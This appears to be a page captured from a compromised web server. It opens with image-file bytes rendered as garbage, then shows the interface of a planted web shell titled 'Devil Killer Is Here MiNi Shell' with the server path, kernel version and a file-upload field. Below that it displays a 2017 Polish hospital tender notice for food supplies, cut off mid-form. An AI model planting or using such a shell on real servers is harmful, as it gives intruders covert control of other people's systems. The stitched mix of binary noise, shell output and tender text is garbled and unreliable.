JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20170403/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20170403/56839-N-2017.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://www.22wszur.pl' target='_blank'>http://www.22wszur.pl</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 56839 - 2017
              z dnia 2017-04-03 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Ciechocinek: Artykuły spożywcze<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Dostawy
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>22 Wojskowy Szpital Uzdrowiskowo-Rehabilitacyjny SP ZOZ, krajowy numer identyfikacyjny
              91051403900000, ul.
              ul. Wojska Polskiego 
              5,
              87720  
              Ciechocinek, woj.
              kujawsko-pomorskie, państwo
              Polska, tel.
              542 837 200, e-mail
              j.zimny@22wszur.pl, faks
              542 837 320.
              <br />
              Adres strony internetowej (URL): www.22wszur.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Podmiot prawa publicznego
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  tak
                <br />www.22wszur.pl</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />www.22wszur.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />przez operatora pocztowego, kurierem lub osobiście<br />
                Adres:
                <br />22 Wojskowy Szpital Uzdrowiskowo Rehabilitacyjny SPZOZ, ul. Wojska Polskiego 5 , 87+720 Ciechocinek + administracja szpitala, pokj nr 13 ( WYŁĄCZNIE)</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Artykuły spożywcze<br /><b>Numer referencyjny: </b>5/2017<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                dostawy
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b><br />6<br /><b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b><br />6<br /><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b> Przedmiotem zamówienia jest sukcesywna dostawa artykułów spożywczych wyszczególnionych w " Formularzu cenowym" stanowiącym  załącznik nr  2 do 
specyfikacji istotnych warunków zamówienia.  
Lp.	Asortyment	Ilość kg/L rocznie
1	2	3
1	Kawa rozpuszczalna    opakowanie słoik szklany/ puszka metalowa100g z zabezpieczeniem próżniowym pod nakrętką. Wartość odżywcza minimum na 100g produktu : białko 7g, węglowodany 8,9g, tłuszcz 0,2g, błonnik 30g, sód 0,1g, minimum kaloryczne 125kacl/100g	3
2	Kawa rozpuszczalna   opakowanie paluszek aluminiowy 2g  z nacięciem do otwierania bez użycia nożyczek. Wartość odżywcza minimum na 100g produktu : białko 7g, węglowodany 8,9g, tłuszcz 0,2g, błonnik 30g, sód 0,1g, minimum kaloryczne 125kacl/100g	10
3	Kawa rozpuszczalna typu Nescafe Espresso lub równoważna; wartość energetyczna w 100 g: 118,00 kcal ; jednolity proszek
Białko w 100 g: 7,80 g 
Węglowodany w 100 g: 3,1g 
Tłuszcz w 100 g: 0,20 g , opakowanie słoik szkalny z zabezpieczeniem próżniowym pod nakrętką / puszka metalowa100g	7
4	Kawa naturalna mielona  100% Arabica torebka 100g, typu JACOBS KRONUNG lub równoważna 	300
5	Herbata czarna,saszetka 0,02kg ,opakowanie torebka lub karton 0,2-  0,4kg	300
6	Herbata zielona  liściasta, opakowanie 0,06 kg 	30
7	Herbata czarna expresowa typu Lipton lub równoważna, opakowanie karton  0,20kg, 100sztuk	60
8	Herbata owoc. / dzika róża 56%, hibiskus , malina 0,7%/  saszetki 2g, opakowanie torebka 60g	12
9	Herbata owoc. / dzika róża 32%, jeżyna 0,2%, malina 0,2%, borówka 0,2%/, saszetki  2g, opakowanie torebka 60g 	12
10	Herbata owoc. / dzika róża, liść mięty, skórki owoców cytrusowych/ , saszetki 2g, opakowanie torebka 60g 	12
11	Herbata życia; saszetki  0,04 kg typu Roiboos	10
12	Sok owocowy   jabłkowy  typu Hortex lub równoważny 100% bez dodatku cukru; opakowanie karton 1l z wielorazowym otwieraczem	180
13	Sok owocowy  pomarańczowy typu Hortex lub równoważny 100% bez dodatku cukru; opakowanie karton 1l z wielorazowym otwieraczem	180
14	Sok pomidorowy  typu Hortex lub równoważny 100% bez dodatku cukru; opakowanie karton 1l z wielorazowym otwieraczem	100
15	Cukier kryształ; opakowanie torebka papierowa  1kg	5700
16	Cukier puder; opakowanie torebka papierowa lub foliowa 0,4-0,5kg	75
17	Jabłka prażone z kawałakmi owoców; opakowanie słoik szklany 0,9-1,0kg 	150
18	Herbata owocowwa - różne smaki pakowana pojedynczo w saszetki , opakowanie karton 0,04-0,07kg	15
19	Dżem truskawka wysoko słodzony, opakowanie słoik  1,0-1,5kg	600
20	Dżem wiśniowy wysoko słodzony, opakowanie  słoik  1,0-1,5kg	100
21	Powidła śliwkowe; opakowanie słoik szklany 0,9-1,0kg	1000
22	Rodzynki sułtańskie; opakowanie torebka foliowa 0,5-1kg	250
23	Wiórki kokosowe ,opakowanie torebka foliowa 0,3-1,0kg	20
24	Śliwki suszone kalifornijskie; opakowanie torebka foliowa 0,5-1,0kg	250
25	Morele suszone; opakowanie torebka foliowa 0,5-1,0kg	300
26	Miód naturalny zestalony (kraj pochodzenia Polska); opakowanie słoik szklany 0,4- 0,5kg	900
27	Grzyby suszone -podgrzybek; opakowanie torebka foliowa 0,5 -1kg	30
28	Koncentrat pomidorowy 30% , zawartość ekstraktu minimum 30%, wartość odżywcza 100g minimum ; białko - 5,9g, węglowodany - 15,9g, tłuszcze - 1,3g, opakowanie szklane 0,9-0,97kg  	1000
29	Groch  łuskany połówki ; opakowanie torebka foliowa lub papierowa 1,0-5,0kg	600
30	Fasola Jaś karłowy; opakowanie torebka foliowa 0,5-5,0kg	800
31	Słonecznik łuskany; opakowanie torebka foliowa lub papierowa 0,1-0,5kg	300
32	Pestki dyni; opakowanie torebka foliowa lub papierowa 0,1-0,5kg	190
33	Siemie lniane ; opakowanie torebka foliowa lub papierowa 0,1-0,5kg	190
34	Konfitura z jagód wartość odżywcza 100g minimum  152 kcal, białko - 0,4g; węglowodany - 38g; tłuszcz - 0,3g; opakowanie słoik szklany 0,24-0,3kg	100
35	Żurawina do mięs z całymi owocami, opakowanie słoik szklany  0,25-0,3kg	100
36	Migdały płatki; opakowanie torebka foliowa lub papierowa 0,1-0,5kg	20
37	Migdały całe; opakowanie torebka foliowa lub papierowa 0,1-0,5kg 	40
38	Orzechy włoskie łuskane, opakowanie torebka foliowa lub papierowa 0,5-1,0kg	150
39	Budyń smakowy ; opakowanie torebka foliowa 0,5-1,0kg	70
40	Galaretki owocowe; opakowanie torebka foliowa 1,0kg	120
41	Kisiel różne smaki, opakowanie torebka foliowa 0,5-1,0kg	50
42	Kakao ciemne o obniżonej zawartości tłuszczu( zaw. tłuszczu  kakaowego 10-12%); wartość odżywcza 100g minimum białko - 10g, węglowodany - 57g, tłuszcze 7g, opakowanie 0,1-0,2kg	3
43	Ciastka kruche, opakowanie karton  2,5kg (waga 10szt 11-18dkg) 	15
44	Suchary delikatesowe 0,25kg	12
45	Soczewica ziarno ( zielona, pomarańczowa ); opakowanie torebka foliowa 0,35-0,5kg; wartość odżywcza 100g minimum białko - 25g; węglowodany - 48,5 g; tłuszcze - 1g	350
46	Soja ziarno; opakowanie torebka foliowa 0,35 - 0,5kg; wartość odżywcza 100g minimum białko - 34g; węglowodany - 17g; tłuszcze - 19,5g	100
47	Chrzan tarty na kwasku cytrynowym; opakowanie słoik szklany 0,9kg ; masa netto 810g	1000
48	Sezam ziarno opakowanie torebka foliowa 0,5 kg 	15
49	Czekolada mleczna ; tabliczka 0,1kg; wartość odżywcza 100g minimum: białko - 6,2g; węglowodany - 57,3g; tłuszcze 30,5g	60
50	Czekolada gorzka ; tabliczka 0,1kg; wartość odżywcza 100g minimum: białko - 8,4g; węglowodany - 39g; tłuszcze 31,5g	50
51	Ciastka kruche w czekoladzie luz; opakowanie karton 2,5kg	10
 	RAZEM	xx
 		
		
PAKIET II		
Lp.	Asortyment	Ilość kg/L rocznie
1	2	3
1	Kukurydza konserwowa; opakowanie puszka  0,4 - 0,425kg; wartość odżywcza 100g minimum : białko - 2,9kg, węglowodany - 10,8g, tłuszcze - 1,9g t	600
2	Groszek konserwowy; opakowanie puszka 0,4kg; wartość odżywcza 100g minimum : białko - 5,3g, węglowodany - 8g, tłuszcze - 0,4g	950
3	Kiełki fasoli Mung 0,4kg	200
4	Fasola konserwowa czerwona ; opakowanie puszka 0,4kg, wartość odżywcza 100g minimum ; białko - 6,7g, weglowodany - 17,4g, tłuszcze - 0,2g	350
5	Brzoskwinie w syropie, opakowanie puszka  0,82kg, masa po odcieku 465g; wartość odżywcza 100g minimum : białko - 0,5g, węglowodany - 14,2g, tłuszcze - 0,05g 	1200
6	Ananasy w syropie w kawałkach; opakowanie puszka 0,565 kg, masa po odcieku 320g	1500
7	Gruszki w syropie; opakowanie puszka 0,82kg, masa po odcieku 460g; wartość odżywcza 100g minimum: białko - 0,3g, weglowodany - 13,6g, tłuszcze - 0,1g	500
8	Papryka konserwowa, paski ; opakowanie słoik szklany 3,70 - 4,50kg  	850
9	Ogórki konserwowe; opakowanie słoik szklany 0,9-1,0l, wartość odżywcza 100g minimum : białko - 1g, węglowodany - 10g, tłuszcze- 0,g 0,9kg 	1200
10	Kapary, opakowanie słoik szklany  0,72kg	8
11	Pieczarki  marynowane całe, opakowanie słoik szklany 0,78kg , masa po odcieku 440g	750
12	Dynia w occie, opakowanie słoik szklany  0,9kg, masa po odcieku 580g 	900
13	Oliwki (czarne, zielone) drylowane krojone, opakowanie słoik szklany  0,9 - 1,0kg 	420
14	Cebulka marynowana żółta, opakowanie słoik szklany  0,8-0,9kg	50
15	Pomidory całe w zalewie, opakowanie puszka 4,65kg	800
16	Cebulka marynowana srebrna, opakowanie słoik szklany  1,7kg 	50
 	RAZEM	xxxxx



		
PAKIET III		
		
Lp.	Asortyment	Ilość kg/L rocznie
1	2	3
1	Pieprz naturalny ziarno, opakowanie torebka foliowa lub papierowa 0,5-1,0kg1 kg	60
2	Pieprz naturalny mielony, opakowanie torebka foliowa lub papierowa 0,5-1,0kg1 kg	6
3	Kwasek cytrynowy, opakowanie torebka foliowa lub papierowa 0,2 - 0,5 kg	60
4	Majeranek , opakowanie torebka foliowa lub papierowa 0,5 kg 	15
5	Przyprawa do zup w płynie, opakowanie butelka szklana 0,96- 1,0 l 	600
6	Bazylia suszona, opakowanie torebka foliowa lub papierowa 0,2 -  0,5 kg 	2
7	Kurkuma mielona, opakowanie torebka foliowa lub papierowa 0,2 -  0,5 kg 	2
8	Przyprawa Wegeta, opakowanie wiaderko plastikowe 5 kg, wartość odżywcza 100g minimum : białko - 8,5g, weglowodany - 24,5g, tłuszcze - 0,6g  1 kg	300
9	Papryka mielona ( ostra, słodka), opakowanie torebka foliowa lub papierowa 0,2- 0,5 kg 	20
10	Liść laurowy, opakowanie torebka foliowa lub papierowa 0,2-  0,5 kg 	5
11	Imbir mielony, opakowanie torebka foliowa lub papierowa 0,2 - 0,5 kg	1
12	Gałka muszkatołowa cała, opakowanie torebka foliowa lub papierowa 0,1 - 0,2 kg	3
13	Oregano suszone, opakowanie torebka foliowa lub papierowa 0,2 - 0,5 kg	1
14	Kminek ziarno, opakowanie torebka foliowa lub papierowa 0,2 - 0,5 kg	3
15	Pieprz ziołowy mielony, opakowanie torebka foliowa lub papierowa 0,5 - 1,0 kg	3
16	Przyprawa curry, opakowanie torebka foliowa lub papierowa 0,2 - 0,5 kg	3
17	Cukier waniliowy, opakowanie torebka foliowa lub papierowa  0,5 kg	20
18	Żelatyna, opakowanie torebka foliowa 0,5 - 1,0kg 	150
19	Ocet spirytusowy, opakowanie butelka plastikowa  0,5 - 1,0l	400
20	Musztarda sarepska, opakowanie słoik szklany 0,9-1,2 kg: wartość odżywcza minimum : białko - 4,4g, węglowodany - 8g, tłuszcze - 5g	500
21	Sól warzona miałka, opakowanie torebka foliowa  1kg	50
22	Sól gruboziarnista, opakowanie torebka foliowa 1kg	2000
23	Majonez stołowy opakowanie wiaderko plastikowe 4,5 - 5,0kg, wartość odżywcza 100g, minimum : białko 1,26g, weglowodany - 3,51g, tłuszcze - 65,8g zawartość tłuszczu minimum 63%	2000
24	Ketchup  łagodny , opakowanie szklane 0,9-1kg,skład minimum :koncentrat pomidorowy 47%, cukier, cebula 9,2%, skrobia kukurydziana, sól, ocet, kwas cytrynowy, przyprawy	500
25	Goździki , opakowanie torebka foliowa 0,1 - 0,2 kg	1
26	Ziele angielskie, opakowanie torebka foliowa 0,2 - 0,5 kg	5
27	Proszek do pieczenia, opakowanie torebka  0,1 - 0,2  kg 	2
28	Ocet winny ( biały, czerwony), opakowanie butelka szklana 0,5-1,0l 	10
29	Cynamon mielony, opakowanie torebka  0,5 kg	3
 	RAZEM	xxx
		
PAKIET IV		
Lp.	Asortyment	Ilość kg/L rocznie
1	2	3
1	Gniazdka nitka opakowanie torebka foliowa 2kg; wartość odżywcza 100g minimum białko - 13,5g, węglowodany - 69,9g, tłuszcze 0,3g	700
2	Kolanka , muszelki duże i małe torebka foliowa 2kg; wartość odżywcza 100g minimum białko - 13,5g, węglowodany - 69,9g, tłuszcze 0,3g	500
3	Świderki małe i duże torebka foliowa 2kg; wartość odżywcza 100g minimum białko - 13,5g, węglowodany - 69,9g, tłuszcze 0,3g	400
4	Łazanki torebka foliowa 2kg; wartość odżywcza 100g minimum białko - 13,5g, węglowodany - 69,9g, tłuszcze 0,3g	200
5	Kokardka mała i duża torebka foliowa 2kg; wartość odżywcza 100g minimum białko - 13,5g, węglowodany - 69,9g, tłuszcze 0,3g	20
6	Lazania opakowanie karton 3kg; wartość odżywcza 100g minimum białko - 13,5g, węglowodany - 69,9g, tłuszcze 0,3g	250
7	Makaron sojowy opakowanie torebka foliowa 0,1 - 0,5 kg	15
8	Pełne ziarno - świderki, kokardki, pióra, gniazdka torebka foliowa 2kg; wartość odżywcza 100g maksimum:  białko - 15,2g, węglowodany - 68g, tłuszcze 1,3g	100
9	Mąka ziemniaczana opakowanie torebka papierowa  1 kg	300
10	Kasza kukurydziana; opakowanie  0,2-0,5 kg; wartość odżywcza 100g minimum : białko - 7,3g, węglowodany - 82g, tłuszcze - 0,8g	20
11	Kasza kuskus opakowanie 0,3 - 0,5kg; wartość odżywcza minimum : białko - 15g, węglowodany - 75g, tłuszcze - 3,0g 	10
12	Ryż długoziarnisty całe ziarno opakowanie torebka foliowa lub papierowa1kg ; wartość odżywcza 100g minimum: białko - 8,8g, węglowodany - 78,8g, tłuszcze - 0,82g	1500
13	Kasza jaglana opakowanie torebka foliowa 0,35 - 0,5 kg; wartość odżywcza minimum: białko - 10,5g, weglowodany - 68,4g, tłuszcze - 2,4g 	150
14	Kasza gryczana prażona, opakowanie 0,3 - 1,0 kg ; wartość odzywcza 100g minimum : białko - 12,6g, węglowodany - 69,3, tłuszcze - 3,1g	200
15	Mąka pszenna typ 500 opakowanie torebka papierowa 1kg; wartość odżywcza 100g minimum ; białko - 9,2g, weglowodany - 74,9g, tłuszcze - 1,2g	5000
16	Kasza jęczmienna perłowa, opakowanie torebka foliowa lub papierowa  1 kg	450
17	Płatki owsiane, opakowanie torebka foliowa lib papierowa  1 kg; wartość odżywcza minimum: białko - 13,5g, węglowodany - 54,5g, tłuszcze - 7,0g	400
18	Otręby owsiane, opakowanie torebka foliowa 0,25kg, kartonik 0,4kg	300
19	Kasza owsiana, opakowanie torebka foliowa 0,25 - 0,1kg  (całe ziarno)	150
20	Kasza manna, opakowanie torebka foliowa lub papierowa 0,5 -  1,0 kg	180
21	Ciecierzyca ziarno, opakowanie torebka foliowa 0,4kg, wartość odżywcza 100g minimum : białko- 21,3g , węglowodany - 36,1g tłuszcze - 5,4g	100
 	RAZEM	xx
		
PAKIET V		
Lp.	Asortyment	Ilość kg/L rocznie
1	2	3
1	Olej z pierwszego tłoczenia, opakowanie butelka plastikowa 1l	1800
2	Oliwa z oliwek  z pierwszego tłoczenia na zimno (EXTRA VIRGIN), opakowanie butelka szklana  1 l	350
3	Masło roślinne , opakowanie pudełko plastikowe 0,5 kg	700
 	RAZEM	xx
		



		
PAKIET VI		
Lp.	Asortyment	Ilość kg/L rocznie
1	2	3
1	Mąka bezglutenowa 1kg	25
2	Bułka tarta bezglutenowa 0,4 kg	2
3	Ciastka kruche z marmoladą niskob. 0,15 kg	1
4	Makaron krakowski 0,25 kg / śwderki,gniazdka, muszelki,nitki cienkie	20
<br /><br /><b>II.5) Główny kod CPV: </b>15000000-8<br /><b> Dodatkowe kody CPV:</b>15800000-6<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    Okres w miesiącach: 12<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                -  działalność zawodowa prowadzona na potrzeby wykonania przedmiotu zamówienia nie wymaga posiadania specjalnych kompetencji lub uprawnień. <br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                  Wymagane jest posiadanie przez wykonawcę odpowiedniego ubezpieczenia odpowiedzialności cywilnej;
  Warunek zostanie spełniony  jeśli Wykonawca przedstawi  polisę ubezpieczenia OC j (bądź inny dokument) od odpowiedzialności cywilnej (deliktowej) z rozszerzonym zakresem ubezpieczenia od odpowiedzialności cywilnej ubezpieczonego za szkody osobowe lub rzeczowe wyrządzone przez produkty dostarczone przez Wykonawcę.
<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                 Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. <br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
